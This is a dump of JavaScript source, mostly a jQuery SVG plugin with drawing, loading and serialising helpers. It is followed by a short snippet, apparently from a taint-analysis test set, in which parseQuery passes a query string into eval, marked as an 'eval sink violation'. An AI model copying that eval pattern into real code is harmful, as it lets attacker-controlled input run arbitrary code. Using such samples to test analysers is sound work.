		@param y {number} The y-coordinate for the top edge of the node.
		@param width {number} The width of the node.
		@param height {number} The height of the node.
		@param [vx] {number} The minimum x-coordinate for view box.
		@param [vy] {number} The minimum y-coordinate for the view box.
		@param [vwidth] {number} The width of the view box.
		@param [vheight] {number} The height of the view box.
		@param [settings] {object} Additional settings for this node.
		@return {SVGElement} The new svg node. */
	svg: function(parent, x, y, width, height, vx, vy, vwidth, vheight, settings) {
		var args = this._args(arguments, ['x', 'y', 'width', 'height', 'vx', 'vy', 'vwidth', 'vheight'], ['vx']);
		var sets = $.extend({x: args.x, y: args.y, width: args.width, height: args.height}, 
			(args.vx != null ? {viewBox: args.vx + ' ' + args.vy + ' ' + args.vwidth + ' ' + args.vheight} : {}));
		return this._makeNode(args.parent, 'svg', $.extend(sets, args.settings || {}));
	},

	/** Create a group.
		@param [parent] {SVGElement|jQuery} The parent node for the new node, or SVG root if not specified.
		@param [id] {string} The ID of this group.
		@param [settings] {object} Additional settings for this node.
		@return {SVGElement} The new group node. */
	group: function(parent, id, settings) {
		var args = this._args(arguments, ['id'], ['id']);
		return this._makeNode(args.parent, 'g', $.extend({id: args.id}, args.settings || {}));
	},

	/** Add a usage reference.
		<p>Specify all of <code>x</code>, <code>y</code>, <code>width</code>, <code>height</code> or none of them.</p>
		@param [parent] {SVGElement|jQuery} The parent node for the new node, or SVG root if not specified.
		@param [x] {number} The x-coordinate for the left edge of the node.
		@param [y] {number} The y-coordinate for the top edge of the node.
		@param [width] {number} The width of the node.
		@param [height] {number} The height of the node.
		@param ref {string} The ID of the definition node.
		@param [settings] {object} Additional settings for this node.
		@return {SVGElement} The new usage reference node. */
	use: function(parent, x, y, width, height, ref, settings) {
		var args = this._args(arguments, ['x', 'y', 'width', 'height', 'ref']);
		if (typeof args.x === 'string') {
			args.ref = args.x;
			args.settings = args.y;
			args.x = args.y = args.width = args.height = null;
		}
		var node = this._makeNode(args.parent, 'use', $.extend(
			{x: args.x, y: args.y, width: args.width, height: args.height}, args.settings || {}));
		node.setAttributeNS($.svg.xlinkNS, 'href', args.ref);
		return node;
	},

	/** Add a link, which applies to all child elements.
		@param [parent] {SVGElement|jQuery} The parent node for the new node, or SVG root if not specified.
		@param ref {string} The target URL.
		@param [settings] {object} Additional settings for this node.
		@return {SVGElement} The new link node. */
	link: function(parent, ref, settings) {
		var args = this._args(arguments, ['ref']);
		var node = this._makeNode(args.parent, 'a', args.settings);
		node.setAttributeNS($.svg.xlinkNS, 'href', args.ref);
		return node;
	},

	/** Add an image.
		@param [parent] {SVGElement|jQuery} The parent node for the new node, or SVG root if not specified.
		@param x {number} The x-coordinate for the left edge of the image.
		@param y {number} The y-coordinate for the top edge of the image.
		@param width {number} The width of the image.
		@param height {number} The height of the image.
		@param ref {string} The path to the image.
		@param [settings] {object} Additional settings for this node.
		@return {SVGElement} The new image node. */
	image: function(parent, x, y, width, height, ref, settings) {
		var args = this._args(arguments, ['x', 'y', 'width', 'height', 'ref']);
		var node = this._makeNode(args.parent, 'image', $.extend(
			{x: args.x, y: args.y, width: args.width, height: args.height}, args.settings || {}));
		node.setAttributeNS($.svg.xlinkNS, 'href', args.ref);
		return node;
	},

	/** Draw a path.
		@param [parent] {SVGElement|jQuery} The parent node for the new node, or SVG root if not specified.
		@param path {string|SVGPath} The path to draw.
		@param [settings] {object} Additional settings for this node.
		@return {SVGElement} The new path node. */
	path: function(parent, path, settings) {
		var args = this._args(arguments, ['path']);
		return this._makeNode(args.parent, 'path', $.extend(
			{d: (args.path.path ? args.path.path() : args.path)}, args.settings || {}));
	},

	/** Draw a rectangle.
		<p>Specify both of <code>rx</code> and <code>ry</code> or neither.</p>
		@param [parent] {SVGElement|jQuery} The parent node for the new node, or SVG root if not specified.
		@param x {number} The x-coordinate for the left edge of the rectangle.
		@param y {number} The y-coordinate for the top edge of the rectangle.
		@param width {number} The width of the rectangle.
		@param height {number} The height of the rectangle.
		@param [rx] {number} The x-radius of the ellipse for the rounded corners.
		@param [ry] {number} The y-radius of the ellipse for the rounded corners.
		@param [settings] {object} Additional settings for this node.
		@return {SVGElement} The new rectangle node. */
	rect: function(parent, x, y, width, height, rx, ry, settings) {
		var args = this._args(arguments, ['x', 'y', 'width', 'height', 'rx', 'ry'], ['rx']);
		return this._makeNode(args.parent, 'rect', $.extend(
			{x: args.x, y: args.y, width: args.width, height: args.height},
			(args.rx ? {rx: args.rx, ry: args.ry} : {}), args.settings || {}));
	},

	/** Draw a circle.
		@param [parent] {SVGElement|jQuery} The parent node for the new node, or SVG root if not specified.
		@param cx {number} The x-coordinate for the centre of the circle.
		@param cy {number} The y-coordinate for the centre of the circle.
		@param r {number} The radius of the circle.
		@param [settings] {object} Additional settings for this node.
		@return {SVGElement} The new circle node. */
	circle: function(parent, cx, cy, r, settings) {
		var args = this._args(arguments, ['cx', 'cy', 'r']);
		return this._makeNode(args.parent, 'circle', $.extend(
			{cx: args.cx, cy: args.cy, r: args.r}, args.settings || {}));
	},

	/** Draw an ellipse.
		@param [parent] {SVGElement|jQuery} The parent node for the new node, or SVG root if not specified.
		@param cx {number} The x-coordinate for the centre of the ellipse.
		@param cy {number} The y-coordinate for the centre of the ellipse.
		@param rx {number} The x-radius of the ellipse.
		@param ry {number} The y-radius of the ellipse.
		@param [settings] {object} Additional settings for this node.
		@return {SVGElement} The new ellipse node. */
	ellipse: function(parent, cx, cy, rx, ry, settings) {
		var args = this._args(arguments, ['cx', 'cy', 'rx', 'ry']);
		return this._makeNode(args.parent, 'ellipse', $.extend(
			{cx: args.cx, cy: args.cy, rx: args.rx, ry: args.ry}, args.settings || {}));
	},

	/** Draw a line.
		@param [parent] {SVGElement|jQuery} The parent node for the new node, or SVG root if not specified.
		@param x1 {number} The x-coordinate for the start of the line.
		@param y1 {number} The y-coordinate for the start of the line.
		@param x2 {number} The x-coordinate for the end of the line.
		@param y2 {number} The y-coordinate for the end of the line.
		@param [settings] {object} Additional settings for this node.
		@return {SVGElement} The new line node. */
	line: function(parent, x1, y1, x2, y2, settings) {
		var args = this._args(arguments, ['x1', 'y1', 'x2', 'y2']);
		return this._makeNode(args.parent, 'line', $.extend(
			{x1: args.x1, y1: args.y1, x2: args.x2, y2: args.y2}, args.settings || {}));
	},

	/** Draw a polygonal line.
		@param [parent] {SVGElement|jQuery} The parent node for the new node, or SVG root if not specified.
		@param points {number[][]} The x-/y-coordinates for the points on the line.
		@param [settings] {object} Additional settings for this node.
		@return {SVGElement} The new polygonal line node. */
	polyline: function(parent, points, settings) {
		var args = this._args(arguments, ['points']);
		return this._poly(args.parent, 'polyline', args.points, args.settings);
	},

	/** Draw a polygonal shape.
		@param [parent] {SVGElement|jQuery} The parent node for the new node, or SVG root if not specified.
		@param points {number[][]} The x-/y-coordinates for the points on the shape.
		@param [settings] {object} Additional settings for this node.
		@return {SVGElement} The new polygonal shape node. */
	polygon: function(parent, points, settings) {
		var args = this._args(arguments, ['points']);
		return this._poly(args.parent, 'polygon', args.points, args.settings);
	},

	/** Draw a polygonal line or shape.
		@private
		@param parent {SVGElement|jQuery} The parent node for the new node.
		@param name {string} The type of polygon to create.
		@param points {number[][]} The x-/y-coordinates for the points on the shape.
		@param [settings] {object} Additional settings for this node.
		@return {SVGElement} The new polygon node. */
	_poly: function(parent, name, points, settings) {
		var ps = '';
		for (var i = 0; i < points.length; i++) {
			ps += points[i].join() + ' ';
		}
		return this._makeNode(parent, name, $.extend({points: $.trim(ps)}, settings || {}));
	},

	/** Draw text.
		<p>Specify both of <code>x</code> and <code>y</code> or neither of them.</p>
		@param [parent] {SVGElement|jQuery} The parent node for the new node, or SVG root if not specified.
		@param [x] {number|number[]} The x-coordinate(s) for the text.
		@param [y] {number|number[]} The y-coordinate(s) for the text.
		@param value {string|SVGText} The text content or text with spans and references.
		@param [settings] {object} Additional settings for this node.
		@return {SVGElement} The new text node. */
	text: function(parent, x, y, value, settings) {
		var args = this._args(arguments, ['x', 'y', 'value']);
		if (typeof args.x === 'string' && arguments.length < 4) {
			args.value = args.x;
			args.settings = args.y;
			args.x = args.y = null;
		}
		return this._text(args.parent, 'text', args.value, $.extend(
			{x: (args.x && $.isArray(args.x) ? args.x.join(' ') : args.x),
			y: (args.y && $.isArray(args.y) ? args.y.join(' ') : args.y)}, args.settings || {}));
	},

	/** Draw text along a path.
		@param [parent] {SVGElement|jQuery} The parent node for the new node, or SVG root if not specified.
		@param path {string} The ID of the path.
		@param value {string|SVGText} The text content or text with spans and references.
		@param [settings] {object} Additional settings for this node.
		@return {SVGElement} The new textpath node. */
	textpath: function(parent, path, value, settings) {
		var args = this._args(arguments, ['path', 'value']);
		var node = this._text(args.parent, 'textPath', args.value, args.settings || {});
		node.setAttributeNS($.svg.xlinkNS, 'href', args.path);
		return node;
	},

	/** Draw text.
		@private
		@param parent {SVGElement|jQuery} The parent node for the new node.
		@param name {string} The type of text to create.
		@param value {string|SVGText} The text content or text with spans and references.
		@param [settings] {object} Additional settings for this node.
		@return {SVGElement} The new text node. */
	_text: function(parent, name, value, settings) {
		var node = this._makeNode(parent, name, settings);
		if (typeof value === 'string') {
			node.appendChild(node.ownerDocument.createTextNode(value));
		}
		else {
			for (var i = 0; i < value._parts.length; i++) {
				var part = value._parts[i];
				if (part[0] === 'tspan') {
					var child = this._makeNode(node, part[0], part[2]);
					child.appendChild(node.ownerDocument.createTextNode(part[1]));
					node.appendChild(child);
				}
				else if (part[0] === 'tref') {
					var child = this._makeNode(node, part[0], part[2]);
					child.setAttributeNS($.svg.xlinkNS, 'href', part[1]);
					node.appendChild(child);
				}
				else if (part[0] === 'textpath') {
					var set = $.extend({}, part[2]);
					set.href = null;
					var child = this._makeNode(node, part[0], set);
					child.setAttributeNS($.svg.xlinkNS, 'href', part[2].href);
					child.appendChild(node.ownerDocument.createTextNode(part[1]));
					node.appendChild(child);
				}
				else { // straight text
					node.appendChild(node.ownerDocument.createTextNode(part[1]));
				}
			}
		}
		return node;
	},

	/** Add a custom SVG element.
		@param [parent] {SVGElement|jQuery} The parent node for the new node, or SVG root if not specified.
		@param name {string} The name of the element.
		@param [settings] {object} Additional settings for this node.
		@return {SVGElement} The new custom node. */
	other: function(parent, name, settings) {
		var args = this._args(arguments, ['name']);
		return this._makeNode(args.parent, args.name, args.settings || {});
	},

	/** Create a SVG node with the given settings.
		@private
		@param parent {SVGElement|jQuery} The parent node for the new node, or SVG root if <code>null</code>.
		@param name {string} The name of the element.
		@param [settings] {object} Additional settings for this node.
		@return {SVGElement} The new node. */
	_makeNode: function(parent, name, settings) {
		parent = parent || this._svg;
		var node = this._svg.ownerDocument.createElementNS($.svg.svgNS, name);
		for (var name in settings) {
			var value = settings[name];
			if (value != null && (typeof value !== 'string' || value !== '')) {
				node.setAttribute($.svg._attrNames[name] || name, value);
			}
		}
		parent.appendChild(node);
		return node;
	},

	/** Add an existing SVG node to the document.
		@param [parent] {SVGElement|jQuery} The parent node for the new node, or SVG root if not specified.
		@param node {SVGElement|string|jQuery} The new node to add or
				the jQuery selector for the node or the set of nodes to add.
		@return {SVGWrapper} This wrapper. */
	add: function(parent, node) {
		var args = this._args((arguments.length === 1 ? [null, parent] : arguments), ['node']);
		var svg = this;
		args.parent = args.parent || this._svg;
		args.node = (args.node.jquery ? args.node : $(args.node));
		try {
			args.parent.appendChild(args.node.cloneNode(true));
		}
		catch (e) {
			args.node.each(function() {
				var child = svg._cloneAsSVG(this);
				if (child) {
					args.parent.appendChild(child);
				}
			});
		}
		return this;
	},

	/** Clone an existing SVG node and add it to the document.
		@param [parent] {SVGElement|jQuery} The parent node for the new node, or SVG root if not specified.
		@param node {SVGEelement|string|jQuery} The new node to add or
				the jQuery selector for the node or the set of nodes to clone.
		@return {SVGElement[]} The collection of new nodes. */
	clone: function(parent, node) {
		var svg = this;
		var args = this._args((arguments.length === 1 ? [null, parent] : arguments), ['node']);
		args.parent = args.parent || this._svg;
		args.node = (args.node.jquery ? args.node : $(args.node));
		var newNodes = [];
		args.node.each(function() {
			var child = svg._cloneAsSVG(this);
			if (child) {
				child.id = '';
				args.parent.appendChild(child);
				newNodes.push(child);
			}
		});
		return newNodes;
	},

	/** SVG nodes must belong to the SVG namespace, so clone and ensure this is so.
		@private
		@param node {SVGElement} The SVG node to clone.
		@return {SVGElement} The cloned node. */
	_cloneAsSVG: function(node) {
		var newNode = null;
		if (node.nodeType === 1) { // element
			newNode = this._svg.ownerDocument.createElementNS($.svg.svgNS, this._checkName(node.nodeName));
			for (var i = 0; i < node.attributes.length; i++) {
				var attr = node.attributes.item(i);
				if (attr.nodeName !== 'xmlns' && attr.nodeValue) {
					if (attr.prefix === 'xlink') {
						newNode.setAttributeNS($.svg.xlinkNS, attr.localName || attr.baseName, attr.nodeValue);
					}
					else {
						newNode.setAttribute(this._checkName(attr.nodeName), attr.nodeValue);
					}
				}
			}
			for (var i = 0; i < node.childNodes.length; i++) {
				var child = this._cloneAsSVG(node.childNodes[i]);
				if (child) {
					newNode.appendChild(child);
				}
			}
		}
		else if (node.nodeType === 3) { // text
			if ($.trim(node.nodeValue)) {
				newNode = this._svg.ownerDocument.createTextNode(node.nodeValue);
			}
		}
		else if (node.nodeType === 4) { // CDATA
			if ($.trim(node.nodeValue)) {
				try {
					newNode = this._svg.ownerDocument.createCDATASection(node.nodeValue);
				}
				catch (e) {
					newNode = this._svg.ownerDocument.createTextNode(
						node.nodeValue.replace(/&/g, '&amp;').replace(/</g, '&lt;').replace(/>/g, '&gt;'));
				}
			}
		}
		return newNode;
	},

	/** Node names must be lower case and without SVG namespace prefix.
		@private
		@param name {string} The name to check.
		@return {string} The corrected name. */
	_checkName: function(name) {
		name = (name.substring(0, 1) >= 'A' && name.substring(0, 1) <= 'Z' ? name.toLowerCase() : name);
		return (name.substring(0, 4) === 'svg:' ? name.substring(4) : name);
	},

	/** Load an external SVG document.
		@param url {string} The location of the SVG document or
				the actual SVG content (starting with '<code>&lt;svg</code>'.
		@param settings {boolean|function|object} Either <code>addTo</code> below or <code>onLoad</code> below or
				additional settings for the load with attributes below:
				<code>addTo</code> {boolean} <code>true</code> to add to what's already there,
				or <code>false</code> to clear the canvas first,
				<code>changeSize</code> {boolean} <code>true</code> to allow the canvas size to change,
				or <code>false</code> to retain the original,
				<code>onLoad</code> {function} callback after the document has loaded,
				'<code>this</code>' is the container, receives SVG object and optional error message as a parameter,
				<code>parent</code> {string|SVGElement|jQuery} the parent to load into,
				defaults to top-level svg element.
		@return {SVGWrapper} This wrapper. */
	load: function(url, settings) {
		settings = (typeof settings === 'boolean' ? {addTo: settings} :
				(typeof settings === 'function' ? {onLoad: settings} :
				(typeof settings === 'string' ? {parent: settings} : 
				(typeof settings === 'object' && settings.nodeName ? {parent: settings} :
				(typeof settings === 'object' && settings.jquery ? {parent: settings} : settings || {})))));
		if (!settings.parent && !settings.addTo) {
			this.clear(false);
		}
		var size = [this._svg.getAttribute('width'), this._svg.getAttribute('height')];
		var wrapper = this;
		// Report a problem with the load
		var reportError = function(message) {
			message = $.svg.local.errorLoadingText + ': ' + message;
			if (settings.onLoad) {
				settings.onLoad.apply(wrapper._container || wrapper._svg, [wrapper, message]);
			}
			else {
				wrapper.text(null, 10, 20, message);
			}
		};
		// Create a DOM from SVG content
		var loadXML4IE = function(data) {
			var xml = new ActiveXObject('Microsoft.XMLDOM');
			xml.validateOnParse = false;
			xml.resolveExternals = false;
			xml.async = false;
			xml.loadXML(data);
			if (xml.parseError.errorCode !== 0) {
				reportError(xml.parseError.reason);
				return null;
			}
			return xml;
		};
		// Load the SVG DOM
		var loadSVG = function(data) {
			if (!data) {
				return;
			}
			if (data.documentElement.nodeName !== 'svg') {
				var errors = data.getElementsByTagName('parsererror');
				var messages = (errors.length ? errors[0].getElementsByTagName('div') : []); // Safari
				reportError(!errors.length ? '???' : (messages.length ? messages[0] : errors[0]).firstChild.nodeValue);
				return;
			}
			var parent = (settings.parent ? $(settings.parent)[0] : wrapper._svg);
			var attrs = {};
			for (var i = 0; i < data.documentElement.attributes.length; i++) {
				var attr = data.documentElement.attributes.item(i);
				if (!(attr.nodeName === 'version' || attr.nodeName.substring(0, 5) === 'xmlns')) {
					attrs[attr.nodeName] = attr.nodeValue;
				}
			}
			wrapper.configure(parent, attrs, !settings.parent);
			var nodes = data.documentElement.childNodes;
			for (var i = 0; i < nodes.length; i++) {
				try {
					parent.appendChild(wrapper._svg.ownerDocument.importNode(nodes[i], true));
					if (nodes[i].nodeName === 'script') {
						$.globalEval(nodes[i].textContent);
					}
				}
				catch (e) {
					wrapper.add(parent, nodes[i]);
				}
			}
			if (!settings.keepRelativeLinks && url.match('/')) {
				var base = url.replace(/\/[^\/]*$/, '/');
				$('*', parent).each(function() {
					var href = $(this).attr('xlink:href');
					if (href && !href.match(/(^[a-z][-a-z0-9+.]*:.*$)|(^\/.*$)|(^#.*$)/i)) {
						$(this).attr('xlink:href', base + href);
					}
				});
			}
			if (!settings.changeSize) {
				wrapper.configure(parent, {width: size[0], height: size[1]});
			}
			if (settings.onLoad) {
				settings.onLoad.apply(wrapper._container || wrapper._svg, [wrapper]);
			}
		};
		if (url.match('<svg')) { // Inline SVG
			try {
				loadSVG(new DOMParser().parseFromString(url, 'text/xml'));
			} catch (e) {
				reportError(e);
			}
		}
		else { // Remote SVG
			$.ajax({url: url, dataType: 'xml',
				success: function(xml) {
					loadSVG(xml);
				}, error: function(http, message, exc) {
					reportError(message + (exc ? ' ' + exc.message : ''));
				}});
		}
		return this;
	},

	/** Delete a specified node.
		@param node {SVGElement|jQuery} The drawing node to remove.
		@return {SVGWrapper} This wrapper. */
	remove: function(node) {
		node = (node.jquery ? node[0] : node);
		node.parentNode.removeChild(node);
		return this;
	},

	/** Delete everything in the current document.
		@param [attrsToo=false] {boolean} <code>true</code> to clear any root attributes as well,
				<code>false</code> to leave them.
		@return {SVGWrapper} This wrapper. */
	clear: function(attrsToo) {
		if (attrsToo) {
			this.configure({}, true);
		}
		while (this._svg.firstChild) {
			this._svg.removeChild(this._svg.firstChild);
		}
		return this;
	},

	/** Serialise the current diagram into an SVG text document.
		@param [node] {SVGElement} The starting node, or SVG root if not specified .
		@return {string} The SVG as text. */
	toSVG: function(node) {
		node = node || this._svg;
		return (typeof XMLSerializer === 'undefined' ? this._toSVG(node) : new XMLSerializer().serializeToString(node));
	},

	/** Serialise one node in the SVG hierarchy.
		@private
		@param node {SVGElement} The current node to serialise.
		@return {string} The serialised SVG. */
	_toSVG: function(node) {
		var svgDoc = '';
		if (!node) {
			return svgDoc;
		}
		if (node.nodeType === 3) { // Text
			svgDoc = node.nodeValue;
		}
		else if (node.nodeType === 4) { // CDATA
			svgDoc = '<![CDATA[' + node.nodeValue + ']]>';
		}
		else { // Element
			svgDoc = '<' + node.nodeName;
			if (node.attributes) {
				for (var i = 0; i < node.attributes.length; i++) {
					var attr = node.attributes.item(i);
					if (!($.trim(attr.nodeValue) === '' || attr.nodeValue.match(/^\[object/) ||
							attr.nodeValue.match(/^function/))) {
						svgDoc += ' ' + (attr.namespaceURI === $.svg.xlinkNS ? 'xlink:' : '') +
							attr.nodeName + '="' + attr.nodeValue + '"';
					}
				}
			}	
			if (node.firstChild) {
				svgDoc += '>';
				var child = node.firstChild;
				while (child) {
					svgDoc += this._toSVG(child);
					child = child.nextSibling;
				}
				svgDoc += '</' + node.nodeName + '>';
			}
				else {
				svgDoc += '/>';
			}
		}
		return svgDoc;
	}
});

/** Helper to generate an SVG path.
	<p>Obtain an instance from the SVGWrapper object.</p>
	<p>String calls together to generate the path and use its value:</p>
	@module SVGPath
	@example var path = root.createPath();
   root.path(null, path.move(100, 100).line(300, 100).line(200, 300).close(), {fill: 'red'});
 // or
   root.path(null, path.move(100, 100).line([[300, 100], [200, 300]]).close(), {fill: 'red'}); */
function SVGPath() {
	this._path = '';
}

$.extend(SVGPath.prototype, {
	/** Prepare to create a new path.
		@return {SVGPath} This path. */
	reset: function() {
		this._path = '';
		return this;
	},

	/** Move the pointer to a position.
		@param x {number|number[][]} x-coordinate to move to or x-/y-coordinates to move to.
		@param [y] {number} y-coordinate to move to (omitted if <code>x</code> is array).
		@param [relative=false] {boolean} <code>true</code> for coordinates relative to the current point,
				<code>false</code> for coordinates being absolute.
		@return {SVGPath} This path. */
	move: function(x, y, relative) {
		relative = ($.isArray(x) ? y : relative);
		return this._coords((relative ? 'm' : 'M'), x, y);
	},

	/** Draw a line to a position.
		@param x {number|number[][]} x-coordinate to move to or x-/y-coordinates to move to.
		@param [y] {number} y-coordinate to move to (omitted if <code>x</code> is array).
		@param [relative=false] {boolean} <code>true</code> for coordinates relative to the current point,
				<code>false</code> for coordinates being absolute.
		@return {SVGPath} This path. */
	line: function(x, y, relative) {
		relative = ($.isArray(x) ? y : relative);
		return this._coords((relative ? 'l' : 'L'), x, y);
	},

	/** Draw a horizontal line to a position.
		@param x {number|number[]} x-coordinate to draw to or x-coordinates to draw to.
		@param relative {boolean} <code>true</code> for coordinates relative to the current point,
				<code>false</code> for coordinates being absolute.
		@return {SVGPath} This path. */
	horiz: function(x, relative) {
		this._path += (relative ? 'h' : 'H') + ($.isArray(x) ? x.join(' ') : x);
		return this;
	},

	/** Draw a vertical line to a position.
		@param y {number|number[]} y-coordinate to draw to or y-coordinates to draw to.
		@param [relative=false] {boolean} <code>true</code> for coordinates relative to the current point,
				<code>false</code> for coordinates being absolute.
		@return {SVGPath} This path. */
	vert: function(y, relative) {
		this._path += (relative ? 'v' : 'V') + ($.isArray(y) ? y.join(' ') : y);
		return this;
	},

	/** Draw a cubic Bézier curve.
		@param x1 {number|number[][]} x-coordinate of beginning control point or
				x-/y-coordinates of control and end points to draw to.
		@param [y1] {number} y-coordinate of beginning control point (omitted if <code>x1</code> is array).
		@param [x2] {number} x-coordinate of ending control point (omitted if <code>x1</code> is array).
		@param [y2] {number} y-coordinate of ending control point (omitted if <code>x1</code> is array).
		@param [x] {number} x-coordinate of curve end (omitted if <code>x1</code> is array).
		@param [y] {number} y-coordinate of curve end (omitted if <code>x1</code> is array).
		@param [relative=false] {boolean} <code>true</code> for coordinates relative to the current point,
				<code>false</code> for coordinates being absolute.
		@return {SVGPath} This path. */
	curveC: function(x1, y1, x2, y2, x, y, relative) {
		relative = ($.isArray(x1) ? y1 : relative);
		return this._coords((relative ? 'c' : 'C'), x1, y1, x2, y2, x, y);
	},

	/** Continue a cubic Bézier curve.
		<p>Starting control point is the reflection of the previous end control point.</p>
		@param x2 {number|number[][]} x-coordinate of ending control point or
				x-/y-coordinates of control and end points to draw to.
		@param [y2] {number} y-coordinate of ending control point (omitted if <code>x2</code> is array).
		@param [x] {number} x-coordinate of curve end (omitted if <code>x2</code> is array).
		@param [y] {number} y-coordinate of curve end (omitted if <code>x2</code> is array).
		@param [relative=false] {boolean} <code>true</code> for coordinates relative to the current point,
				<code>false</code> for coordinates being absolute.
		@return {SVGPath} This path. */
	smoothC: function(x2, y2, x, y, relative) {
		relative = ($.isArray(x2) ? y2 : relative);
		return this._coords((relative ? 's' : 'S'), x2, y2, x, y);
	},

	/** Draw a quadratic Bézier curve.
		@param x1 {number|number[][]} x-coordinate of control point or
				x-/y-coordinates of control and end points to draw to.
		@param [y1] {number} y-coordinate of control point (omitted if <code>x1</code> is array).
		@param [x] {number} x-coordinate of curve end (omitted if <code>x1</code> is array).
		@param [y] {number} y-coordinate of curve end (omitted if <code>x1</code> is array).
		@param [relative=false] {boolean} <code>true</code> for coordinates relative to the current point,
				<code>false</code> for coordinates being absolute.
		@return {SVGPath} This path. */
	curveQ: function(x1, y1, x, y, relative) {
		relative = ($.isArray(x1) ? y1 : relative);
		return this._coords((relative ? 'q' : 'Q'), x1, y1, x, y);
	},

	/** Continue a quadratic Bézier curve.
		<p>Control point is the reflection of the previous control point.</p>
		@param x {number|number[][]} x-coordinate of curve end or x-/y-coordinates of points to draw to.
		@param [y] {number} y-coordinate of curve end (omitted if <code>x</code> is array).
		@param [relative=false] {boolean} <code>true</code> for coordinates relative to the current point,
				<code>false</code> for coordinates being absolute.
		@return {SVGPath} This path. */
	smoothQ: function(x, y, relative) {
		relative = ($.isArray(x) ? y : relative);
		return this._coords((relative ? 't' : 'T'), x, y);
	},

	/** Generate a path command with (a list of) coordinates.
		@private
		@param cmd {string} The command for the path element.
		@param x1 {number} The first x-coordinate.
		@param y1 {number} The first y-coordinate.
		@param [x2] {number} The second x-coordinate.
		@param [y2] {number} The second y-coordinate.
		@param [x3] {number} The third x-coordinate.
		@param [y3] {number} The third y-coordinate.
		@return {SVGPath} This path. */
	_coords: function(cmd, x1, y1, x2, y2, x3, y3) {
		if ($.isArray(x1)) {
			for (var i = 0; i < x1.length; i++) {
				var cs = x1[i];
				this._path += (i === 0 ? cmd : ' ') + cs[0] + ',' + cs[1] + (cs.length < 4 ? '' :
						' ' + cs[2] + ',' + cs[3] + (cs.length < 6 ? '': ' ' + cs[4] + ',' + cs[5]));
			}
		}
		else {
			this._path += cmd + x1 + ',' + y1 + 
				(x2 == null ? '' : ' ' + x2 + ',' + y2 + (x3 == null ? '' : ' ' + x3 + ',' + y3));
		}
		return this;
	},

	/** Draw an arc to a position.
		@param rx {number|any[][]} x-radius of arc or x-/y-coordinates and flags for points to draw to.
		@param [ry] {number} y-radius of arc (omitted if <code>rx</code> is array).
		@param [xRotate] {number} x-axis rotation (degrees, clockwise) (omitted if <code>rx</code> is array).
		@param [large] {boolean} <code>true</code> to draw the large part of the arc,
				<code>false</code> to draw the small part (omitted if <code>rx</code> is array).
		@param [clockwise] {boolean} <code>true</code> to draw the clockwise arc,
				<code>false</code> to draw the anti-clockwise arc (omitted if <code>rx</code> is array).
		@param [x] {number} x-coordinate of arc end (omitted if <code>rx</code> is array).
		@param [y] {number} y-coordinate of arc end (omitted if <code>rx</code> is array).
		@param [relative=false] {boolean} <code>true</code> for coordinates relative to the current point,
				<code>false</code> for coordinates being absolute.
		@return {SVGPath} This path. */
	arc: function(rx, ry, xRotate, large, clockwise, x, y, relative) {
		relative = ($.isArray(rx) ? ry : relative);
		this._path += (relative ? 'a' : 'A');
		if ($.isArray(rx)) {
			for (var i = 0; i < rx.length; i++) {
				var cs = rx[i];
				this._path += (i === 0 ? '' : ' ') + cs[0] + ',' + cs[1] + ' ' +
					cs[2] + ' ' + (cs[3] ? '1' : '0') + ',' + (cs[4] ? '1' : '0') + ' ' + cs[5] + ',' + cs[6];
			}
		}
		else {
			this._path += rx + ',' + ry + ' ' + xRotate + ' ' +
				(large ? '1' : '0') + ',' + (clockwise ? '1' : '0') + ' ' + x + ',' + y;
		}
		return this;
	},

	/** Close the current path.
		@return {SVGPath} This path. */
	close: function() {
		this._path += 'z';
		return this;
	},

	/** Return the string rendering of the specified path.
		@return {string} The stringified path. */
	path: function() {
		return this._path;
	}
});

SVGPath.prototype.moveTo = SVGPath.prototype.move;
SVGPath.prototype.lineTo = SVGPath.prototype.line;
SVGPath.prototype.horizTo = SVGPath.prototype.horiz;
SVGPath.prototype.vertTo = SVGPath.prototype.vert;
SVGPath.prototype.curveCTo = SVGPath.prototype.curveC;
SVGPath.prototype.smoothCTo = SVGPath.prototype.smoothC;
SVGPath.prototype.curveQTo = SVGPath.prototype.curveQ;
SVGPath.prototype.smoothQTo = SVGPath.prototype.smoothQ;
SVGPath.prototype.arcTo = SVGPath.prototype.arc;

/** Helper to generate an SVG text object.
	<p>Obtain an instance from the SVGWrapper object.</p>
	<p>String calls together to generate the text and use its value:</p>
	@module SVGText
	@example var text = root.createText();
   root.text(null, x, y, text.string('This is ').
     span('red', {fill: 'red'}).string('!'), {fill: 'blue'}); */
function SVGText() {
	this._parts = []; // The components of the text object
}

$.extend(SVGText.prototype, {
	/** Prepare to create a new text object.
		@return {SVGText} This text object. */
	reset: function() {
		this._parts = [];
		return this;
	},

	/** Add a straight string value.
		@param value {string} The actual text.
		@return {SVGText} This text object. */
	string: function(value) {
		this._parts.push(['text', value]);
		return this;
	},

	/** Add a separate text span that has its own settings.
		@param value {string} The actual text.
		@param settings {object} The settings for this text.
		@return {SVGText} This text object. */
	span: function(value, settings) {
		this._parts.push(['tspan', value, settings]);
		return this;
	},

	/** Add a reference to a previously defined text string.
		@param id {string} The ID of the actual text.
		@param settings {object} The settings for this text.
		@return {SVGText} This text object. */
	ref: function(id, settings) {
		this._parts.push(['tref', id, settings]);
		return this;
	},

	/** Add text drawn along a path.
		@param id {string} The ID of the path.
		@param value {string} The actual text.
		@param settings {object} The settings for this text.
		@return {SVGText} This text object. */
	path: function(id, value, settings) {
		this._parts.push(['textpath', value, $.extend({href: id}, settings || {})]);
		return this;
	}
});

/** Attach the SVG functionality to a jQuery selection.
	@param [command] {string} The command to run.
	@param [options] {object} The new settings to use for these SVG instances.
	@return {jQuery} For chaining further calls. */
$.fn.svg = function(options) {
	var otherArgs = Array.prototype.slice.call(arguments, 1);
	if (typeof options === 'string' && options === 'get') {
		return $.svg['_' + options + 'SVG'].apply($.svg, [this[0]].concat(otherArgs));
	}
	return this.each(function() {
		if (typeof options === 'string') {
			$.svg['_' + options + 'SVG'].apply($.svg, [this].concat(otherArgs));
		}
		else {
			$.svg._attachSVG(this, options || {});
		} 
	});
};

// Singleton primary SVG interface
$.svg = new SVGManager();

})(jQuery);


==> results/gnuplot/simplified-11.js <==
function parseQuery(query) { 			                 // query is marked as sensitive
   if(query instanceof Function || typeof(query) === 'string') { // query is pushed on the stack
      //eval sink violation
      var normalizedFunction = eval("(function() {var obj=this; return "+query+"})")
      return [new Part(undefined, '$where', normalizedFunction)]
   }
   // ...
}

var Part = function(field, operator, operand, parts, implicitField) {
    if(parts === undefined) parts = []     //marked as sensitive due to implicit flow
    this.field = field                     //marked as sensitive due to implicit flow
    this.operator = operator               //marked as sensitive due to implicit flow
